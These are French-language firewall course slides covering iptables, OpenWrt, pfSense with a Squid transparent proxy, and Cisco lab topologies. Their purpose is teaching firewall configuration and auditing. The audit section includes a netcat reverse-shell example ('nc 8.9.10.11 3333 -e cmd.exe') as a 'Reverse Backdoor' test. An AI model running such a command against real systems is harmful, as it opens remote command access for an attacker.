La table filter filtre le
trafic dans trois
situations (chanes) :
INPUT : destination d
une interface du pare-
feu
OUTPUT : sortant dune
interface du pare-feu
FORWARD : traversant
le pare-feu dune
interface une autre
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Cibles possibles
loption -j (jump) dfinit une cible (une action) :
ACCEPT : le paquet est accept et pris en
charge par les processus du noyeau
DROP : le paquet est jet, sans plus
REJECT : le paquet est jet, mais un
message derreur est renvoy au
destinataire
LOG : journalisation du trafic. passe la
rgle suivante.
...
une autre chane utilisateur
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
La table nat
Le NAT/PAT vise rcrire les champs dadresses et
de ports TCP/IP du trafic qui traverse le pare-feu.
Il est principalement utile dans le cadre du manque d
adresses IPv4 globale.
Il peut intervenir avant que le trafic soit rout, en
changeant ladresse et le port de destination (DNAT,
redirection) vers un serveur
Il peut intervenir aprs que le trafic soit rout, en
changeant dadresse et le port source (SNAT,
masquage) pour offrir une connectivit globale un bloc
IP priv
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Chanes de la table NAT
PREROUTING :
DNAT : redirection de port dans une DMZ
REDIRECT : redirection (vers un proxy)
POSTROUTING :
SNAT : NAT/PAT statique
MASQUERADE : NAT overload (masquage)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Cibles de la table NAT
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Syntaxe
iptables -t [filter, nat]
commandes : -A,
chane : [INPUT, OUTPUT, FORWARD]
critres : -i, -o, -s, -d, -p, -m, .
-j : jump action ou rgles utilisateur :
DROP, REJECT, ACCEPT, LOG, ...
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Commandes
-t : dsigne la table [filter, nat]
-F : supprime toutes les chanes prdfinies
-X : supprime toutes les chanes utilisateurs
-A : ajoute une rgle une chane (et une table) suivi de critres et dun jump
-D : supprime une rgle
-I : insre une rgle
-P : Dfinit la politique (ou cible) par dfaut d'une chane. Seules les chanes
prdfinies peuvent avoir un comportement par dfaut. Cette cible ne sera
applique qu'aprs l'excution de la dernire rgle de la chane.
-L -n -v : Liste les rgles
-S : Liste les commandes
-j : jump : action : [DROP, REJECT, ACCEPT, LOG]
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Les critres
Les critres peuvent tre multiples :
Interface source ou destination.
Adresse IP source ou de destination.
Port source ou de destination.
Type de trame.
Nombre de paquets.
Paquet marqu par la table Mangle.
Etc.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Les critres de filtrage (1/2)
-p <protocol-type> Protocole ; icmp, tcp, udp, et all
-s <ip-address> Adresse IP source
-d <ip-address> Adresse IP destination
-i <interface-name> nom dinterface dentre : eth0, eth1
-o <interface-name> nom dinterface de sortie : eth0, eth1
-p tcp --sport <port> port TCP source.
-p tcp --dport <port> port TCP destination.
-p tcp --syn Utilis pour identifier une nouvelle requte de connexion. ! --syn signifie pas de
nouvelle de requte de connexion
-p udp --sport <port> port UDP source.
-p udp --dport <port> port UDP destination.
--icmp-type <type> echo-reply, echo-request
-m multiport --sports <port, port>
-m multiport --dports <port, port>
-m multiport --ports <port, port>
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Les critres de filtrage (2/2)
-m --state <state>
ESTABLISHED: Le paquet fait partie dune connexion qui a t constate dans les deux
directions.
NEW: Le paquet est le dbut dune nouvelle connexion.
RELATED: Le paquet dmarre une seconde nouvelle connexion
INVALID: Le paquet ne peut pas tre identifi.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Chanes Utilisateurs
Les chanes utilisateurs sont des chanes
spcifiques dfinies par ladministrateur (autres
que les chanes prdfinies PREROUTING,
INPUT, FORWARD, OUTPUT et
POSTROUTING).
Elles sont appeles :
par une ou dautres chanes utilisateurs ou,
par une ou plusieurs chanes prdfinies.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pratique Iptables
A partir de la station de travail, veuillez vous connecter en
SSH sur le pare-feu Linux :
login as: root
root@192.168.1XY.1's password:
BusyBox v1.19.4 (2013-03-06 20:07:44 UTC) built-in shell (ash)
Enter 'help' for a list of built-in commands.
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
ATTITUDE ADJUSTMENT (12.09, r36088)
-----------------------------------------------------
* 1/4 oz Vodka Pour all ingredients into mixing
* 1/4 oz Gin tin with ice, strain into glass.
* 1/4 oz Amaretto
* 1/4 oz Triple sec
* 1/4 oz Peach schnapps
* 1/4 oz Sour mix
* 1 splash Cranberry juice
-----------------------------------------------------
root@OpenWrt:~#
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pare-feu de base
Rinitialisation des rgles
Hardening du pare-feu : Politique INPUT
Pare-feu applicatif : Politique FORWARD
NAT/PAT overload : Chane NAT
POSTROUTING
Vrification
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rinitialisation des rgles
iptables -F
iptables -X
iptables -L -n -v
Maintient des sessions tablies :
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Politique INPUT
Refus de tout trafic entrant sur linterface LAN
sauf ladministration HTTP, SSH et DHCP, sauf
le trafic de loopback :
iptables -t filter -A INPUT -p tcp -i br-lan --dport ssh -j ACCEPT
iptables -t filter -A INPUT -p tcp -i br-lan --dport 80 -j ACCEPT
iptables -t filter -A INPUT -p udp -i br-lan --dport 67:68 -j ACCEPT
iptables -t filter -A INPUT -p icmp --icmp-type echo-request -m limit --
limit 100/s -i br-lan -j ACCEPT
iptables -I INPUT 2 -i lo -j ACCEPT
iptables -P INPUT DROP
Comment autoriser du trafic DHCP sur l
interface WAN (eth1) ?
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Politique FORWARD
Le trafic initi derrire le pare-feu est autoris
le traverser avec un suivi des connexions :
iptables -A FORWARD -o eth1 -m state --state
NEW,RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i eth1 -m state --state
NEW,RELATED,ESTABLISHED -j ACCEPT
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Chaine NAT POSTROUTING
Activation du NAT :
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
root@OpenWrt:~# iptables -t nat -L -n -v
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Vrification
Chain INPUT (policy DROP 77 packets, 6323 bytes)
pkts bytes target prot opt in out source destination
1425 143K ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0
ctstate ESTABLISHED
0 0 ACCEPT all -- lo * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT tcp -- br-lan * 0.0.0.0/0 0.0.0.0/0
tcp dpt:22
127 6604 ACCEPT tcp -- br-lan * 0.0.0.0/0 0.0.0.0/0
tcp dpt:80
0 0 ACCEPT udp -- br-lan * 0.0.0.0/0 0.0.0.0/0
udp dpts:67:68
1 60 ACCEPT icmp -- br-lan * 0.0.0.0/0 0.0.0.0/0
icmp type 8 limit: avg 100/sec burst 5
Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
47 2740 ACCEPT all -- * eth1 0.0.0.0/0 0.0.0.0/0
state NEW,RELATED,ESTABLISHED
47 2814 ACCEPT all -- eth1 * 0.0.0.0/0 0.0.0.0/0
state NEW,RELATED,ESTABLISHED
Chain OUTPUT (policy ACCEPT 1329 packets, 440K bytes)
pkts bytes target prot opt in out source destination
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Questions
Comment sauvegarder/restaurer ses rgles
?
Comment crer une configuration sous
forme de script ?
Quelle serait la configuration plus fine ?
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
9. Examen avanc du
pare-feu Netfilter
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
9. Examen avanc
Observation des rgles de LuCI Firewall
Filtrage IPv6
Cration dune DMZ
Epreuve nc/nmap
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rgles LuCI NAT Masquerade
iptables -S -t nat
-P PREROUTING ACCEPT
-P INPUT ACCEPT
-P OUTPUT ACCEPT
-P POSTROUTING ACCEPT
-A POSTROUTING -o eth1 -j zone_wan_nat
-A zone_wan_nat -j MASQUERADE
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rgles LuCI firewall (1/3)
iptables -S -t filter
-P INPUT ACCEPT
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j syn_flood
-A INPUT -j input_rule
-A INPUT -j input
-A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -j forwarding_rule
-A FORWARD -j forward
-A FORWARD -j reject
-A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -j output_rule
-A OUTPUT -j output
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rgles LuCI firewall (2/3)
-A forward -i br-lan -j zone_lan_forward
-A forward -i eth1 -j zone_wan_forward
-A input -i br-lan -j zone_lan
-A input -i eth1 -j zone_wan
-A output -j zone_lan_ACCEPT
-A output -j zone_wan_ACCEPT
-A reject -p tcp -j REJECT --reject-with tcp-reset
-A reject -j REJECT --reject-with icmp-port-unreachable
-A syn_flood -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN
-m limit --limit 25/sec --limit-burst 50 -j RETURN
-A syn_flood -j DROP
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rgles LuCI firewall (3/3)
-A zone_lan -j input_lan
-A zone_lan -j zone_lan_ACCEPT
-A zone_lan_ACCEPT -o br-lan -j ACCEPT
-A zone_lan_ACCEPT -i br-lan -j ACCEPT
-A zone_lan_DROP -o br-lan -j DROP
-A zone_lan_DROP -i br-lan -j DROP
-A zone_lan_REJECT -o br-lan -j reject
-A zone_lan_REJECT -i br-lan -j reject
-A zone_lan_forward -j zone_wan_ACCEPT
-A zone_lan_forward -j forwarding_lan
-A zone_lan_forward -j zone_lan_REJECT
-A zone_wan -p udp -m udp --dport 68 -j ACCEPT
-A zone_wan -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A zone_wan -j input_wan
-A zone_wan -j zone_wan_REJECT
-A zone_wan_ACCEPT -o eth1 -j ACCEPT
-A zone_wan_ACCEPT -i eth1 -j ACCEPT
-A zone_wan_DROP -o eth1 -j DROP
-A zone_wan_DROP -i eth1 -j DROP
-A zone_wan_REJECT -o eth1 -j reject
-A zone_wan_REJECT -i eth1 -j reject
-A zone_wan_forward -j forwarding_wan
-A zone_wan_forward -j zone_wan_REJECT
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exercice : Configuration stricte
1. Autoriser le trafic Loopback
2. Bloquer le trafic des rseaux Bogon
3. Bloquer le trafic venant de rseaux privs (RFC1918)
sur lInternet
4. Autoriser finement le trafic de gestion (SSH, HTTP) et
de contrle (NTP, DHCP, DNS) du pare-feu
5. Fonction anti-SynFlood
6. Limiter les ICMP echos request externes
7. Nautoriser en sortie que le trafic HTTP et HTTPS avec
filtrage SPI.
8. Activer le DNS Forwarder et le service NTP.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Filtrage IPv6
http://wiki.openwrt.org/doc/uci/network6
http://wiki.openwrt.org/doc/howto/ipv6
#!/bin/sh
opkg update
opkg install kmod-ipv6
opkg install kmod-ip6tables
opkg install ip6tables
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemples avancs
Usage avanc : http://www.linuxhomenetworking.com/wiki/index.
php/Quick_HOWTO_:_Ch14_:
_Linux_Firewalls_Using_iptables#Advanced_iptables_Initialization
Port Forwarding : http://www.linuxhomenetworking.com/wiki/index.
php/Quick_HOWTO_:_Ch14_:
_Linux_Firewalls_Using_iptables#Port_Forwarding_Type_NAT_.
28DHCP_DSL.29
Redirection :
http://www.netfilter.org/documentation/HOWTO/fr/NAT-HOWTO-6.html#ss6.2
Logs :
http://olivieraj.free.fr/fr/linux/information/firewall/fw-03-09.html
Sous Openwrt : logread | firewall
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Ajout dune DMZ (1/2)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Ajout dune DMZ (2/2)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rfrences
Pare-feu_(informatique), Firewall_(computing), Zone_dmilitarise_(informatique)
http://en.wikipedia.org/wiki/Cyber_security_and_countermeasure
http://fr.wikipedia.org/wiki/Pare-feu_%C3%A0_%C3%A9tats
http://en.wikipedia.org/wiki/Stateful_firewall
http://en.wikipedia.org/wiki/Application_layer_firewall
http://en.wikipedia.org/wiki/Proxy_server
http://fr.wikipedia.org/wiki/Proxy
http://en.wikipedia.org/wiki/Reverse_proxy
http://en.wikipedia.org/wiki/Content-control_software
http://en.wikipedia.org/wiki/Category:Web_caching_protocol
http://commons.wikimedia.org/wiki/File:Netfilter_schema.png
Quick_HOWTO_:_Ch14_:_Linux_Firewalls_Using_iptables
http://olivieraj.free.fr/fr/linux/information/firewall/index.html
http://wiki.openwrt.org/doc/howto/netfilter
http://wiki.openwrt.org/doc/uci/firewall
http://man.cx/iptables
http://man.cx/ip6tables
http://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Security/SAFE_RG/safesmallentnetworks.html
Zone-Based Policy Firewall Design and Application Guide
Zone-Based Policy Firewall IPv6 Support
http://www.sans.org/score/checklists/FirewallChecklist.pdf
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
10. Audit du pare-feu
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Ajout dune station pirate
A laide des logiciels Netcat et NMAP, veuillez
prouver le pare-feu et son architecture en
suivant le document :
http://fr.scribd.com/doc/201674667/ICND1-
0x02-Labs-TCP
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Scnarios de test : Topologie client
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Scnarios sur le lab : Topologie
client/server
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple : Reverse Backdoor
Pour excuter une attaque Backdoor :
Sur la machine joindre
nc l p 3333
Sur la machine distante
nc 8.9.10.11 3333 -e cmd.exe
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Outils daudit
Couche/protocole commandes
Application DNS : nslookup, dig
Transport (TCP/UDP) netcat, nmap, hping3
IPv6, ICMPv6/ND thc-ipv6
IPv4, ICMP ping, ifconfig/ipconfig, netstat -r/route
print, traceroute
Ethernet/ARP arp
arping
arp-scan
macchanger
arpspoof
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
III. Pratique pfSense
Pare-feu thorie et pratique
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Sommaire Pratique pfSense
11. Topologie pfSense
12. Observation et configuration du pare-feu
13. Configuration Proxy Transparent
14. NAT : DMZ ou Reverse Proxy
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
11. Topologie pfSense
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie de base
Fonctionnalits
NAT/PAT, SNAT/DNAT
Topologie dtude, topologie physique,
topologie logique
Composants personnels, quipes
Paramtres rseau et des VMs
Installation du pare-feu pfsense
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Fonctionnalits
En bordure du rseau, le pare-feu tablit la
connectivit IPv4 avec des fonctions de
routage et de NAT.
Il peut intgrer des fonctionnalits
VPN/IPS/Firewall/proxy intgres ou spares.
On peut ajouter la topologies des moniteurs
IDS/IPS, des appliances NAC, une gestion
intgres des accs, des pare-feu et anti-X
locaux.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
NAT/PAT
La fonctionnalit NAT/PAT vise r-crire les en-ttes
de couche 3 et couche 4.
Il rompt la connectivit TCP/IP.
Il est indispensable pour connecter un rseau global
un rseau IPv4 priv.
Il na pour objectif que dassurer des migrations d
adressage IPv4, notamment en rduisant le manque d
adresses IPv4.
Il ne constitue en rien un technique de scurit, de
filtrage ou de contrle. Il rend le rseau IPv4 un peu
plus opaque.
Il est souvent excut ct des processus de filtrage
puisquil sagit de rcriture de paquets.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
SNAT/DNAT
Le SNAT vise rcrire les adresses/ports source.
Le DNAT vise rcrire les adresses/ports source.
On peut jouer sur les numros de ports source et
destination.
Les ports connus :
TCP80 HTTP,
TCP443 HTTPS,
TCP25 SMTP,
UDP53 DNS,
UDP123 NTP,
TCP22 SSH,
TCP21 FTP
...
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie dtude
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie physique
Rseau VMWare
128Mo 1Go
128Mo 1Go
1Go 2Go
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Composants personnels
Station Windows ou autre sur un LAN virtuel, station de
contrle du pare-feu en HTTPS et en SSH
Pare-feu Pfsense
Des attaquants potentiels, les stations hardware du
rseau physique.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie BSD/pfSense
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Paramtres rseau
Apprenant X
Equipe Y
Zone Vmware Br Mode BSD
Intf
Adresse
WAN VMNET0 Bridged em0 DHCP
LAN VMNET1 Host-Only em1 192.168.1XY.*/24
DMZ VMNET2 Host-Only em2 192.168.XY.*/24
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Paramtres des VMs
Une VM Windows 7 prte avec Firefox.
Une VM pfsense 2.1 64 bits (512 Mo RAM) :
iso tlcharger
Une interface de gestion par dfaut
192.168.1.1/24
Mot de passe pfSense : admin/pfsense
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Procdure dinstallation du pare-feu
pfSense
1. Lancer la VM avec lISO du Live-CD
2. Trois interfaces.
3. Option I au dmarrage
4. vlan : n
5. wan : em0
6. lan : em1
7. redmarrez
8. Allez sur https://192.168.1.1/ partir de la
VM du LAN
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Configuration gnrale
Configuration gnrale : System/Setup Wizard
Hostname : pfSense-XY > Next
Timezone : Europe/Brussels > Next
Block RFC1918 Private Networks : non-coch
Block bogon networks : non-coch > Next
LAN IP Address : 192.168.1XY.1/24 > Next
Password : > Next > Reload
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Documentation dinstallation
pfSense
https://doc.pfsense.org/index.
php/Installing_pfSense_in_vmware_under_windows
https://doc.pfsense.org/index.
php/PfSense_ISO_installation_step-by-step
https://doc.pfsense.org/smiller/Install_Guide.htm
https://doc.pfsense.org/index.
php/PfSense_2_on_VMware_ESXi_5
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
12. Observation et
configuration du pare-feu
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pfsense
pfSense est un routeur / pare-feu open source bas sur
FreeBSD. pfSense peut tre install sur un simple
ordinateur personnel comme sur un serveur. Bas sur PF
(packet filter), comme iptables sur GNU/Linux, il est rput
pour sa fiabilit. Aprs une installation en mode console, il
s'administre ensuite simplement depuis une interface web
et gre nativement les VLAN (802.1q).
Un support commercial est disponible ainsi quune offre d
appliances Hardware ou virtuelles.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Observation et configuration du
pare-feu
Observation de la configuration par dfaut
oprationnelle.
Configuration avance
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall: Rules LAN
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall Rules WAN
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall Rules NAT (auto)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall Rules NAT (manual)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Configuration des logs
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exercice 1 : Configuration stricte
1. Autoriser le trafic Loopback
2. Bloquer le trafic venant des rseaux Bogon
3. Bloquer le trafic venant de rseaux privs (RFC1918)
sur lInternet
4. Autoriser finement le trafic de gestion (SSH, HTTP) et
de contrle (NTP, DHCP, DNS) du pare-feu
5. Fonction anti-SynFlood
6. Limiter les ICMP echos request externes
7. Nautoriser en sortie que le trafic HTTP et HTTPS avec
filtrage SPI.
8. Activer le DNS Forwarder et le service NTP.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rseaux bogon
En IPv4 source destination de linterface WAN du pare-
feu, les rseaux bogon bloquer :
Classe D : Multicast 224.0.0.0/4
Classe E : Rserv 240.0.0.0/5
Adresse de loopback 127.0.0.0/8
Premier rseau : 0.0.0.0/8
Adresse de Broadcast 255.255.255.255/32
Adresses APIPA 169.254.0.0/16
Adresses prives : 10.0.0.0/8, 172.16.0.0/12,
192.168.0.0/24
$EXTERNAL_IP
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall: Rules WAN
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall: Rules LAN
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Status: System logs: Firewall
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
13. Configuration Proxy
Transparent
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rappel : Serveur Proxy (1/2)
La fonctionnalit serveur Proxy (mandataire) consiste lui
confier du trafic qui le traverse, avec le support dHTTP,
HTTPS, FTP, voire tout protocole TCP/UDP.
Cette fonctionnalit rompt la connectivit TCP/IP mais
permet un contrle fin du trafic des utilisateurs.
A des fins de performance : cache, compression, de filtrage de publicit ou
de contenus lourds
A des fins de journalisation
En supportant AAA pour contrler le trafic des utilisateurs internes
(authentification, autorisation, comptabilisation)
En assurant la confidentialit des communications (chiffrement)
En filtrant sur base des URLs, voire du contenu
En reprenant des fonctionnalits de pare-feu
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rappel : Serveur Proxy (2/2)
Un serveur proxy est un logiciel local ( des fins de mise en
tunnel), excut sur un serveur distant ou sur le pare-feu
lui-mme.
Il peut ncessiter une intervention sur les machines clientes
ou tre totalement transparent.
Un serveur proxy remplace les paramtres TCP/IP de l
metteur et le rend plus transparent sur le rseau. Dune
certaine manire il peut renforcer lanonymat.
Un Forwarding proxy prend en charge les
requtes venant dun rseau interne et les
transfre vers lInternet.
Un proxy ouvert prend en charge les
requtes venant de nimporte quel rseau
et les transfre vers lInternet.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Procdure Proxy Transparent
Installation du logiciel Squid3-dev
Configuration gnrale
Dsactivation du transfert du trafic sortant et
du NAT sur le LAN
Gnration dun certificat (CA autosign)
Filtrage SSL
Exercices complmentaires
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Installation des paquets Squid
Dans System>Packages, veuillez installer
squid3-dev et LightSquid.
Vous pourrez par aprs tester SquidGuard-
squid3, ou/et Dansguardian.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Proxy server: General Settings (1/3)
Dans Services>Proxy Server :
Onglet General Settings
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Proxy server: General Settings (2/3)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Proxy server: General Settings (3/3)
Cliquez sur Save en bas de la page
Redmarrez le service
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall: Rules LAN
Il devient inutile dautoriser du trafic sortant. En
effet, seul le Proxy sort du trafic HTTP.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall: NAT: Outbound
Plus besoin du NAT pour le LAN !
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
LightSquid Reports
Dans Services>Proxy Reports :
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Cacher le trafic HTTPS
Squid3 nest pas encore configur pour cacher le trafic
HTTPS. Le serveur Proxy va proposer son certificat (
gnrer en premier lieu).
Sil nest pas install dans le magasin de certificats des
machines clientes (CA autosigne) ou sil nest pas
sign par une CA valide, cela na pas beaucoup d
intrts.
On peut toutefois tester la fonctionnalit en ignorant les
avertissements des navigateurs, quand cest possible.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
System: Certificate Authorithy
Manager
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
System: Certificate Authorithy
Manager
Vrification
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Proxy server: General Settings : SSL
Cliquez sur Save en bas de la page
Redmarrez le service
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exercices complmentaires
1. Mise en place de SquidGuard
2. Mise en place de DansGuardian
3. Authentification Radius et une base de
donne (MySQL, LDAP/MS-AD, ),
configuration NTLM
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pour aller plus loin sur les proxys
3 Implementations of
proxies
3.1 Web proxy servers
3.2 SOCKS proxy
3.3 Transparent proxy
3.3.1 Purpose
3.3.2 Issues
3.3.3 Implementation
methods
3.3.4 Detection
3.4 CGI proxy
3.5 Anonymous HTTPS
proxy
3.6 Suffix proxy
3.7 Tor onion proxy
software
3.8 I2P anonymous
proxy
3.9 Proxy vs. NAT
3.10 DNS proxy
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rfrences Squid/pfSense
https://doc.pfsense.org/index.
php/Setup_Squid_as_a_Transparent_Proxy
https://doc.pfsense.org/index.php/SquidGuard
https://doc.pfsense.org/index.php/Category:Squid
Filtering HTTPS / SSL Traffic on pfSense 2.1 using
Squid Proxy
https://doc.pfsense.org/index.
php/HAVP_Package_for_HTTP_Anti-Virus_Scanning
https://forum.pfsense.org/index.php?topic=42664.0
(DansGuardian)
http://thegeekninja.wordpress.com/2013/07/02/pfsense-
squid3-and-dansguardian-a-better-alternative-to-
squidguard/
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
14. DMZ : NAT ou Reverse
Proxy
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Reverse-Proxy
Un Reverse proxy apparat comme tant le
serveur destinataire final. Il prend en charge les
requtes venant de lInternet et les transfre
un rseau interne.
En ce sens un Reverse-Proxy peut cacher les
caractristiques du serveur qui est demand. Il
peut prendre en charge des fonctionnalits de
filtrage de haut-niveau applicatif.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Fonctionnalits Reverse-Proxy
WAF : Fonctionnalits Applications Firewall
contre des attaques Web et les Worms
SSL Acceleration : Prise en charge du
chiffrement SSL la place du fournisseur de
contenu
Load Balancing : Rpartiteur de trafic (Web)
Mise en cache et/ou compression de
contenu statique ou dynamique, Web
Acceleration
Rcriture dURL, migration de sites WEB
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Activit
1. Installation dune DMZ avec un serveur WEB
a. Ajout dune interface et dun serveur
b. Rgles Firewall
c. Rgle DNAT
d. et/ou Reverse Proxy
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rfrences
https://www.google.be/search?
q=reverse+proxy+pfsense
http://www.ophyde.com/reverse-proxy-avec-pfsense/
http://www.ophyde.com/reverse-proxy-https-avec-
pfsense/
http://blogs.technet.
com/b/nexthop/archive/2014/04/07/configuring-pfsense-
as-a-reverse-proxy-for-lync-web-services.aspx
https://www.google.be/search?
q=apache2+reverse+proxy+howto+debian
https://www.google.be/search?
q=nginx+reverse+proxy+howto+debian
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
IV. Pratique Cisco IOS
Pare-feu thorie et pratique
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Sommaire Pratique Cisco IOS
15. Topologie Cisco
16. ACLs Cisco IOS
17. Cisco ZBF
18. Pare-feu Cisco IPv6
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
15. Topologie Cisco
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Fonctionnalits de la topologie
En bordure du rseau, le pare-feu tablit la
connectivit IPv4 avec des fonctions de
routage et de NAT.
Packet Tracer (PT) ne supporte pas cette
topologie.
On peut par contre utiliser :
du vrai matriel
GNS3/Virtualbox
CSR1000v/VMWare
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Configuration de la topologie
Le pare-feu est virtualis (GNS3)
Le LAN est aussi virtualis avec Virtualbox par
exemple. On y trouve une station avec un OS graphique
: 192.168.1XY.0/24
Le WAN se connecte au rseau local de la machine
physique et obtient ses paramtres IP dynamiquement
(configuration GNS3 Bridging).
La DMZ est aussi virtualise de la mme manire.
La faible emprunte sur votre PC de lab dpend des OS
utiliss. LOpen Source peut vous aider.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Zone de confiance sur un pare-feu
Organisation du rseau en zones
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie dtude
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie Cisco
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Composants personnels
Stations agnostiques
Console directe sur l
IOS
Routeur Cisco IOS :
C3725
ADVENTERPRISEK9-M
Version 12.4(15)T14
Des attaquants
potentiels, les stations
hardware du rseau
physique.
